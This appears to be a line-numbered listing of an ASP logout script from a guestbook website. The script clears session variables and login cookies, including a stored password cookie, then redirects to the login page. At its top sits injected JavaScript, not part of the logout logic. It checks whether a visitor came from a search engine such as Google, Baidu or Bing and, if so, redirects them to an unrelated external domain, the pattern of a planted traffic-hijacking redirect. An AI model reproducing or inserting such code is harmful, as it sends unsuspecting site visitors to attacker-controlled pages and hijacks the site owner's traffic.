d:\wwwroot\wuchunhua\liuyan\logout.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<%
002:
Session("Id") = ""
003:
Session("Name") = ""
004:
Session("IsPassed") = FALSE
005:
Session("IsAdmin") = FALSE
006:
Session("Class") = ""
007:
008:
Response.Cookies("Name") = ""
009:
Response.Cookies("Password") = ""
010:
Response.Cookies("RemMe") = ""
011:
012:
Response.Redirect "login.asp"
013:
Response.End
014:
%
>
015:
016: